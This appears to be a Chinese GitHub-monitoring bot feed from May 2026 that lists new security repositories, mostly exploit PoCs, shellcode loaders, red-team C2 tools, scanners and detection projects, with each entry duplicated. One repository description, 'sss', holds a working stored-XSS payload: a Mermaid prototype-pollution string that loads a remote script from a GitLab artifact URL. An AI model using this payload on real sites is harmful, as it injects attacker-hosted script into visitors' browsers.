🚨 GitHub 监控消息提醒
🚨 发现关键词: #XSS #CVE
📦 项目名称: pocket-android-xss-0click-cve
👤 项目作者: FUNFACTOR1
🛠 开发语言: Unknown
⭐ Star数量: 0 | 🍴 Fork数量: 0
📅 更新时间: 2026-05-26 22:56:15
📝 项目描述:
🔗 点击访问项目地址
🚨 发现关键词: #XSS #CVE
📦 项目名称: pocket-android-xss-0click-cve
👤 项目作者: FUNFACTOR1
🛠 开发语言: Unknown
⭐ Star数量: 0 | 🍴 Fork数量: 0
📅 更新时间: 2026-05-26 22:56:15
📝 项目描述:
0-click XSS (CWE-79) in Mozilla Pocket Android v8.33.0.0 via unsanitized $(document.body).html(content) in articleview-mobile.js. Background service triggers execution without user interaction. Java bridge exposed. Reported to Mozilla Security 2024-07-10. Won't Fix. CVE pending.🔗 点击访问项目地址
GitHub
GitHub - FUNFACTOR1/pocket-android-xss-0click-cve: 0-click XSS (CWE-79) in Mozilla Pocket Android v8.33.0.0 via unsanitized $(…
0-click XSS (CWE-79) in Mozilla Pocket Android v8.33.0.0 via unsanitized $(document.body).html(content) in articleview-mobile.js. Background service triggers execution without user interaction. Jav...
🚨 GitHub 监控消息提醒
🚨 发现关键词: #Burp #Extension
📦 项目名称: kingfisher-burp-suite-extension
👤 项目作者: andrebhu
🛠 开发语言: Java
⭐ Star数量: 0 | 🍴 Fork数量: 0
📅 更新时间: 2026-05-26 22:41:27
📝 项目描述:
🔗 点击访问项目地址
🚨 发现关键词: #Burp #Extension
📦 项目名称: kingfisher-burp-suite-extension
👤 项目作者: andrebhu
🛠 开发语言: Java
⭐ Star数量: 0 | 🍴 Fork数量: 0
📅 更新时间: 2026-05-26 22:41:27
📝 项目描述:
Burp Suite extension for Kingfisher secret scanning🔗 点击访问项目地址
GitHub
GitHub - andrebhu/kingfisher-burp-suite-extension: Burp Suite extension for Kingfisher secret scanning
Burp Suite extension for Kingfisher secret scanning - andrebhu/kingfisher-burp-suite-extension
🚨 GitHub 监控消息提醒
🚨 发现关键词: #XSS #POC #Stored
📦 项目名称: Bludit-Exploitation
👤 项目作者: AnhNg1410
🛠 开发语言: Python
⭐ Star数量: 0 | 🍴 Fork数量: 0
📅 更新时间: 2026-05-26 23:40:22
📝 项目描述:
🔗 点击访问项目地址
🚨 发现关键词: #XSS #POC #Stored
📦 项目名称: Bludit-Exploitation
👤 项目作者: AnhNg1410
🛠 开发语言: Python
⭐ Star数量: 0 | 🍴 Fork数量: 0
📅 更新时间: 2026-05-26 23:40:22
📝 项目描述:
PoC script for Bludit CMS Privilege Escalation: Leveraging Stored XSS and CSRF to escalate user privileges from Author to Administrator.🔗 点击访问项目地址
GitHub
GitHub - AnhNg1410/Bludit-Exploitation: PoC script for Bludit CMS Privilege Escalation: Leveraging Stored XSS and CSRF to escalate…
PoC script for Bludit CMS Privilege Escalation: Leveraging Stored XSS and CSRF to escalate user privileges from Author to Administrator. - AnhNg1410/Bludit-Exploitation
🚨 GitHub 监控消息提醒
🚨 发现关键词: #Nuclei #template #templates
📦 项目名称: GalSpec
👤 项目作者: jyshangguan
🛠 开发语言: Jupyter Notebook
⭐ Star数量: 5 | 🍴 Fork数量: 4
📅 更新时间: 2026-05-27 01:01:29
📝 项目描述:
🔗 点击访问项目地址
🚨 发现关键词: #Nuclei #template #templates
📦 项目名称: GalSpec
👤 项目作者: jyshangguan
🛠 开发语言: Jupyter Notebook
⭐ Star数量: 5 | 🍴 Fork数量: 4
📅 更新时间: 2026-05-27 01:01:29
📝 项目描述:
Spectral Analysis of Galaxy and Active galactic Nuclei🔗 点击访问项目地址
GitHub
GitHub - jyshangguan/GalSpec: Spectral Analysis of Galaxy and Active galactic Nuclei
Spectral Analysis of Galaxy and Active galactic Nuclei - jyshangguan/GalSpec
🚨 GitHub 监控消息提醒
🚨 发现关键词: #Exploit #CVE
📦 项目名称: CVE-2021-3560-exploit
👤 项目作者: Jeanback1
🛠 开发语言: Shell
⭐ Star数量: 0 | 🍴 Fork数量: 0
📅 更新时间: 2026-05-27 00:48:29
📝 项目描述:
🔗 点击访问项目地址
🚨 发现关键词: #Exploit #CVE
📦 项目名称: CVE-2021-3560-exploit
👤 项目作者: Jeanback1
🛠 开发语言: Shell
⭐ Star数量: 0 | 🍴 Fork数量: 0
📅 更新时间: 2026-05-27 00:48:29
📝 项目描述:
CVE-2021-3560 — Polkit privilege escalation exploit via accounts-daemon D-Bus race condition🔗 点击访问项目地址
GitHub
GitHub - Jeanback1/CVE-2021-3560-exploit: CVE-2021-3560 — Polkit privilege escalation exploit via accounts-daemon D-Bus race condition
CVE-2021-3560 — Polkit privilege escalation exploit via accounts-daemon D-Bus race condition - Jeanback1/CVE-2021-3560-exploit
🚨 GitHub 监控消息提醒
🚨 发现关键词: #RCE #CVE
📦 项目名称: Drupal_REST-RCE_Unauthenticated
👤 项目作者: joaoaugustom
🛠 开发语言: Python
⭐ Star数量: 0 | 🍴 Fork数量: 0
📅 更新时间: 2026-05-27 01:28:32
📝 项目描述:
🔗 点击访问项目地址
🚨 发现关键词: #RCE #CVE
📦 项目名称: Drupal_REST-RCE_Unauthenticated
👤 项目作者: joaoaugustom
🛠 开发语言: Python
⭐ Star数量: 0 | 🍴 Fork数量: 0
📅 更新时间: 2026-05-27 01:28:32
📝 项目描述:
This exploit is based on CVE-2019-6340 and was built upon the original exploit by leonjza and the Metasploit module, extending it can be executed multiple times against the same target without waiting for cache expiration.🔗 点击访问项目地址
GitHub
GitHub - joaoaugustom/Drupal_REST-RCE_Unauthenticated: This exploit is based on CVE-2019-6340 and was built upon the original exploit…
This exploit is based on CVE-2019-6340 and was built upon the original exploit by leonjza and the Metasploit module, extending it can be executed multiple times against the same target without wait...
🚨 GitHub 监控消息提醒
🚨 发现关键词: #Shellcode #Loader #Evasion
📦 项目名称: Shellcode-Loader
👤 项目作者: ReversingID
🛠 开发语言: C++
⭐ Star数量: 280 | 🍴 Fork数量: 49
📅 更新时间: 2026-05-27 02:34:34
📝 项目描述:
🔗 点击访问项目地址
🚨 发现关键词: #Shellcode #Loader #Evasion
📦 项目名称: Shellcode-Loader
👤 项目作者: ReversingID
🛠 开发语言: C++
⭐ Star数量: 280 | 🍴 Fork数量: 49
📅 更新时间: 2026-05-27 02:34:34
📝 项目描述:
Open repository for learning dynamic shellcode loading (sample in many programming languages)🔗 点击访问项目地址
GitHub
GitHub - ReversingID/Shellcode-Loader: Open repository for learning dynamic shellcode loading (sample in many programming languages)
Open repository for learning dynamic shellcode loading (sample in many programming languages) - ReversingID/Shellcode-Loader
🚨 GitHub 监控消息提醒
🚨 发现关键词: #弱口令 #口令
📦 项目名称: mysql-weak-scan
👤 项目作者: lilu-yhl
🛠 开发语言: Python
⭐ Star数量: 0 | 🍴 Fork数量: 0
📅 更新时间: 2026-05-27 02:16:26
📝 项目描述:
🔗 点击访问项目地址
🚨 发现关键词: #弱口令 #口令
📦 项目名称: mysql-weak-scan
👤 项目作者: lilu-yhl
🛠 开发语言: Python
⭐ Star数量: 0 | 🍴 Fork数量: 0
📅 更新时间: 2026-05-27 02:16:26
📝 项目描述:
Mysql弱口令扫描工具🔗 点击访问项目地址
GitHub
GitHub - lilu-yhl/mysql-weak-scan: Mysql弱口令扫描工具
Mysql弱口令扫描工具. Contribute to lilu-yhl/mysql-weak-scan development by creating an account on GitHub.
🚨 GitHub 监控消息提醒
🚨 发现关键词: #XSS #Stored
📦 项目名称: sss
👤 项目作者: yonathandoss2017
🛠 开发语言: Unknown
⭐ Star数量: 1 | 🍴 Fork数量: 0
📅 更新时间: 2026-05-27 02:42:33
📝 项目描述:
🔗 点击访问项目地址
🚨 发现关键词: #XSS #Stored
📦 项目名称: sss
👤 项目作者: yonathandoss2017
🛠 开发语言: Unknown
⭐ Star数量: 1 | 🍴 Fork数量: 0
📅 更新时间: 2026-05-27 02:42:33
📝 项目描述:
%%{init: { 'prototype': {'__proto__': {'template': '<iframe xmlns=\"http://www.w3.org/1999/xhtml\" srcdoc=\"<script src=https://gitlab.com/cataha319/stored-xss/-/jobs/1460297351/artifacts/raw/payload.js> </script>\">'}}} }%% %%{init: { 'prototype': {'__proto__': {'template': '<iframe xmlns=\"http://www.w3.org/1999/xhtml\" srcdoc=\"<script src=https://gitlab.com/cataha319/stored-xss/-/jobs/1460297351/artifacts/raw/payload.js> </script>\">'}}} }%% sequenceDiagram Alice->>Bob: Hi Bob Bob->>Alice: Hi Alice🔗 点击访问项目地址
GitHub
GitHub - yonathandoss2017/sss: %%{init: { 'prototype': {'__proto__': {'template': '<iframe xmlns=\"http://www.w3.org/1999/xhtml\"…
%%{init: { 'prototype': {'__proto__': {'template': '<iframe xmlns=\"http://www.w3.org/1999/xhtml\" srcdoc=\"...
🚨 GitHub 监控消息提醒
🚨 发现关键词: #Sigma #SIEM
📦 项目名称: hybrid-ransomware-detection
👤 项目作者: vkmahalakshmi03
🛠 开发语言: Python
⭐ Star数量: 0 | 🍴 Fork数量: 0
📅 更新时间: 2026-05-27 05:02:47
📝 项目描述:
🔗 点击访问项目地址
🚨 发现关键词: #Sigma #SIEM
📦 项目名称: hybrid-ransomware-detection
👤 项目作者: vkmahalakshmi03
🛠 开发语言: Python
⭐ Star数量: 0 | 🍴 Fork数量: 0
📅 更新时间: 2026-05-27 05:02:47
📝 项目描述:
cybersecurity soc ransomware mitre-attack sigma threat-detection siem machine-learning python blue-team🔗 点击访问项目地址
GitHub
GitHub - vkmahalakshmi03/hybrid-ransomware-detection: cybersecurity soc ransomware mitre-attack sigma threat-detection siem…
cybersecurity soc ransomware mitre-attack sigma threat-detection siem machine-learning python blue-team - vkmahalakshmi03/hybrid-ransomware-detection
🚨 GitHub 监控消息提醒
🚨 发现关键词: #CVE-2026 #POC
📦 项目名称: CVE20265172poc
👤 项目作者: lottiedeyan
🛠 开发语言: Python
⭐ Star数量: 0 | 🍴 Fork数量: 0
📅 更新时间: 2026-05-27 05:56:05
📝 项目描述:
🔗 点击访问项目地址
🚨 发现关键词: #CVE-2026 #POC
📦 项目名称: CVE20265172poc
👤 项目作者: lottiedeyan
🛠 开发语言: Python
⭐ Star数量: 0 | 🍴 Fork数量: 0
📅 更新时间: 2026-05-27 05:56:05
📝 项目描述:
CVE-2026-5172: buffer overflow in extract_addresses() on crafted resource record PoC🔗 点击访问项目地址
GitHub
GitHub - lottiedeyan/CVE20265172poc: CVE-2026-5172: buffer overflow in extract_addresses() on crafted resource record PoC
CVE-2026-5172: buffer overflow in extract_addresses() on crafted resource record PoC - lottiedeyan/CVE20265172poc
🚨 GitHub 监控消息提醒
🚨 发现关键词: #CVE-2026 #POC
📦 项目名称: CVE20264893poc
👤 项目作者: lottiedeyan
🛠 开发语言: Python
⭐ Star数量: 0 | 🍴 Fork数量: 0
📅 更新时间: 2026-05-27 05:56:33
📝 项目描述:
🔗 点击访问项目地址
🚨 发现关键词: #CVE-2026 #POC
📦 项目名称: CVE20264893poc
👤 项目作者: lottiedeyan
🛠 开发语言: Python
⭐ Star数量: 0 | 🍴 Fork数量: 0
📅 更新时间: 2026-05-27 05:56:33
📝 项目描述:
Generate the poc for CVE-2026-4893: broken EDNS Client Subnet validation.🔗 点击访问项目地址
GitHub
GitHub - lottiedeyan/CVE20264893poc: Generate the poc for CVE-2026-4893: broken EDNS Client Subnet validation.
Generate the poc for CVE-2026-4893: broken EDNS Client Subnet validation. - lottiedeyan/CVE20264893poc
🚨 GitHub 监控消息提醒
🚨 发现关键词: #Bypass #Sandbox
📦 项目名称: gdrive-upload-mcp
👤 项目作者: zenk-t-suzuki
🛠 开发语言: TypeScript
⭐ Star数量: 0 | 🍴 Fork数量: 0
📅 更新时间: 2026-05-27 06:59:11
📝 项目描述:
🔗 点击访问项目地址
🚨 发现关键词: #Bypass #Sandbox
📦 项目名称: gdrive-upload-mcp
👤 项目作者: zenk-t-suzuki
🛠 开发语言: TypeScript
⭐ Star数量: 0 | 🍴 Fork数量: 0
📅 更新时间: 2026-05-27 06:59:11
📝 项目描述:
MCP server on Cloudflare Workers that uploads files to your own Google Drive over plain HTTP — file bytes bypass JSON-RPC.🔗 点击访问项目地址
GitHub
GitHub - zenk-t-suzuki/gdrive-upload-mcp: MCP server on Cloudflare Workers that uploads files to your own Google Drive over plain…
MCP server on Cloudflare Workers that uploads files to your own Google Drive over plain HTTP — file bytes bypass JSON-RPC. - zenk-t-suzuki/gdrive-upload-mcp
🚨 GitHub 监控消息提醒
🚨 发现关键词: #Bypass #WAF
📦 项目名称: oxide-communityedtion-v8.5.0
👤 项目作者: HyperSecurityLabs
🛠 开发语言: Rust
⭐ Star数量: 4 | 🍴 Fork数量: 0
📅 更新时间: 2026-05-27 06:59:51
📝 项目描述:
🔗 点击访问项目地址
🚨 发现关键词: #Bypass #WAF
📦 项目名称: oxide-communityedtion-v8.5.0
👤 项目作者: HyperSecurityLabs
🛠 开发语言: Rust
⭐ Star数量: 4 | 🍴 Fork数量: 0
📅 更新时间: 2026-05-27 06:59:51
📝 项目描述:
OXIDE Framework v8.4.9 — AI-augmented web vulnerability scanner written in Rust. Features 15+ scanners (SQLi, XSS, LFI, CORS, TLS, creds, etc.), WAF bypass engine, ML-driven zero-day detection, Instagram OSINT, session hijack testing, async web crawler, and encrypted test database.🔗 点击访问项目地址
GitHub
GitHub - HyperSecurityLabs/oxide-communityedtion-v8.5.0: OXIDE Framework v8.4.9 — AI-augmented web vulnerability scanner written…
OXIDE Framework v8.4.9 — AI-augmented web vulnerability scanner written in Rust. Features 15+ scanners (SQLi, XSS, LFI, CORS, TLS, creds, etc.), WAF bypass engine, ML-driven zero-day detection, Ins...
🚨 GitHub 监控消息提醒
🚨 发现关键词: #RCE #POC
📦 项目名称: poc-tpl-rce
👤 项目作者: vulntestaj2-byte
🛠 开发语言: JavaScript
⭐ Star数量: 0 | 🍴 Fork数量: 0
📅 更新时间: 2026-05-27 06:23:27
📝 项目描述:
🔗 点击访问项目地址
🚨 发现关键词: #RCE #POC
📦 项目名称: poc-tpl-rce
👤 项目作者: vulntestaj2-byte
🛠 开发语言: JavaScript
⭐ Star数量: 0 | 🍴 Fork数量: 0
📅 更新时间: 2026-05-27 06:23:27
📝 项目描述:
无描述🔗 点击访问项目地址
GitHub
GitHub - vulntestaj2-byte/poc-tpl-rce
Contribute to vulntestaj2-byte/poc-tpl-rce development by creating an account on GitHub.
🚨 GitHub 监控消息提醒
🚨 发现关键词: #Sliver #C2
📦 项目名称: SharpADIDNS
👤 项目作者: RedteamNotes
🛠 开发语言: C#
⭐ Star数量: 1 | 🍴 Fork数量: 0
📅 更新时间: 2026-05-27 06:53:26
📝 项目描述:
🔗 点击访问项目地址
🚨 发现关键词: #Sliver #C2
📦 项目名称: SharpADIDNS
👤 项目作者: RedteamNotes
🛠 开发语言: C#
⭐ Star数量: 1 | 🍴 Fork数量: 0
📅 更新时间: 2026-05-27 06:53:26
📝 项目描述:
A C# CLI tool for reading and modifying AD-Integrated DNS records over LDAP, built for serious red teaming and packed with tradecraft features tailored for Sliver C2 execute-assembly.🔗 点击访问项目地址
GitHub
GitHub - RedteamNotes/SharpADIDNS: C# command-line tool for reading and modifying Active Directory-Integrated DNS (ADIDNS) records…
C# command-line tool for reading and modifying Active Directory-Integrated DNS (ADIDNS) records over LDAP. - RedteamNotes/SharpADIDNS
🚨 GitHub 监控消息提醒
🚨 发现关键词: #Ivanti #POC
📦 项目名称: ivanti-poc-loc
👤 项目作者: ionutzzu12
🛠 开发语言: MDX
⭐ Star数量: 0 | 🍴 Fork数量: 0
📅 更新时间: 2026-05-27 07:25:43
📝 项目描述:
🔗 点击访问项目地址
🚨 发现关键词: #Ivanti #POC
📦 项目名称: ivanti-poc-loc
👤 项目作者: ionutzzu12
🛠 开发语言: MDX
⭐ Star数量: 0 | 🍴 Fork数量: 0
📅 更新时间: 2026-05-27 07:25:43
📝 项目描述:
languages folder🔗 点击访问项目地址
GitHub
GitHub - ionutzzu12/ivanti-poc-loc: languages folder
languages folder. Contribute to ionutzzu12/ivanti-poc-loc development by creating an account on GitHub.
🚨 GitHub 监控消息提醒
🚨 发现关键词: #RCE #CVE
📦 项目名称: SOC336-Windows-OLE-Zero-Click-RCE-Exploitation-Detected-CVE-2025-21298
👤 项目作者: abc1230940
🛠 开发语言: Unknown
⭐ Star数量: 0 | 🍴 Fork数量: 0
📅 更新时间: 2026-05-27 08:50:00
📝 项目描述:
🔗 点击访问项目地址
🚨 发现关键词: #RCE #CVE
📦 项目名称: SOC336-Windows-OLE-Zero-Click-RCE-Exploitation-Detected-CVE-2025-21298
👤 项目作者: abc1230940
🛠 开发语言: Unknown
⭐ Star数量: 0 | 🍴 Fork数量: 0
📅 更新时间: 2026-05-27 08:50:00
📝 项目描述:
无描述🔗 点击访问项目地址
GitHub
GitHub - abc1230940/SOC336-Windows-OLE-Zero-Click-RCE-Exploitation-Detected-CVE-2025-21298
Contribute to abc1230940/SOC336-Windows-OLE-Zero-Click-RCE-Exploitation-Detected-CVE-2025-21298 development by creating an account on GitHub.
🚨 GitHub 监控消息提醒
🚨 发现关键词: #漏洞 #利用
📦 项目名称: WPeGPT-Analyzer
👤 项目作者: WPeace-HcH
🛠 开发语言: PowerShell
⭐ Star数量: 0 | 🍴 Fork数量: 0
📅 更新时间: 2026-05-27 08:36:29
📝 项目描述:
🔗 点击访问项目地址
🚨 发现关键词: #漏洞 #利用
📦 项目名称: WPeGPT-Analyzer
👤 项目作者: WPeace-HcH
🛠 开发语言: PowerShell
⭐ Star数量: 0 | 🍴 Fork数量: 0
📅 更新时间: 2026-05-27 08:36:29
📝 项目描述:
可移植的逆向分析 SKILL 技能,驱动 IDA + WPeGPT 插件,对 PE/ELF 进行三种模式的自动化分析(轻量/全量/漏洞),输出分析报告。支持 SKILL 技能机制的 AI Agent 均可加载使用。🔗 点击访问项目地址
GitHub
GitHub - WPeace-HcH/WPeGPT-Analyzer: 可移植的逆向分析 SKILL 技能,驱动 IDA + WPeGPT 插件,对 PE/ELF 进行三种模式的自动化分析(轻量/全量/漏洞),输出分析报告。支持 SKILL 技能机制的…
可移植的逆向分析 SKILL 技能,驱动 IDA + WPeGPT 插件,对 PE/ELF 进行三种模式的自动化分析(轻量/全量/漏洞),输出分析报告。支持 SKILL 技能机制的 AI Agent 均可加载使用。 - WPeace-HcH/WPeGPT-Analyzer
🚨 GitHub 监控消息提醒
🚨 发现关键词: #XSS #Reflected
📦 项目名称: Campus-Sec
👤 项目作者: leiyifan324-cyber
🛠 开发语言: Python
⭐ Star数量: 0 | 🍴 Fork数量: 0
📅 更新时间: 2026-05-27 08:31:42
📝 项目描述:
🔗 点击访问项目地址
🚨 发现关键词: #XSS #Reflected
📦 项目名称: Campus-Sec
👤 项目作者: leiyifan324-cyber
🛠 开发语言: Python
⭐ Star数量: 0 | 🍴 Fork数量: 0
📅 更新时间: 2026-05-27 08:31:42
📝 项目描述:
Built a local web penetration testing lab using Flask and SQLite, simulating SQL injection, reflected XSS, and IDOR vulnerabilities. Implemented secure fixes with parameterized queries, output encoding, and authorization checks, then validated the remediation through automated regression tests.🔗 点击访问项目地址
GitHub
GitHub - leiyifan324-cyber/Campus-Sec: Built a local web penetration testing lab using Flask and SQLite, simulating SQL injection…
Built a local web penetration testing lab using Flask and SQLite, simulating SQL injection, reflected XSS, and IDOR vulnerabilities. Implemented secure fixes with parameterized queries, output enco...
🚨 GitHub 监控消息提醒
🚨 发现关键词: #CVE-2026 #POC #Exploit
📦 项目名称: CVE-2026-XBEN-001
👤 项目作者: 24520597-blip
🛠 开发语言: Unknown
⭐ Star数量: 0 | 🍴 Fork数量: 0
📅 更新时间: 2026-05-27 09:13:12
📝 项目描述:
🔗 点击访问项目地址
🚨 发现关键词: #CVE-2026 #POC #Exploit
📦 项目名称: CVE-2026-XBEN-001
👤 项目作者: 24520597-blip
🛠 开发语言: Unknown
⭐ Star数量: 0 | 🍴 Fork数量: 0
📅 更新时间: 2026-05-27 09:13:12
📝 项目描述:
A critical Server-Side Template Injection (SSTI) vulnerability exists in the X-Trading Portal v1.4.2 dashboard metadata rendering engine. The flaw is due to improper sanitization of user-controlled input in the username and widget_label fields before they are processed by the internal Smarty template parser.🔗 点击访问项目地址
GitHub
24520597-blip/CVE-2026-XBEN-001
A critical Server-Side Template Injection (SSTI) vulnerability exists in the X-Trading Portal v1.4.2 dashboard metadata rendering engine. The flaw is due to improper sanitization of user-controll...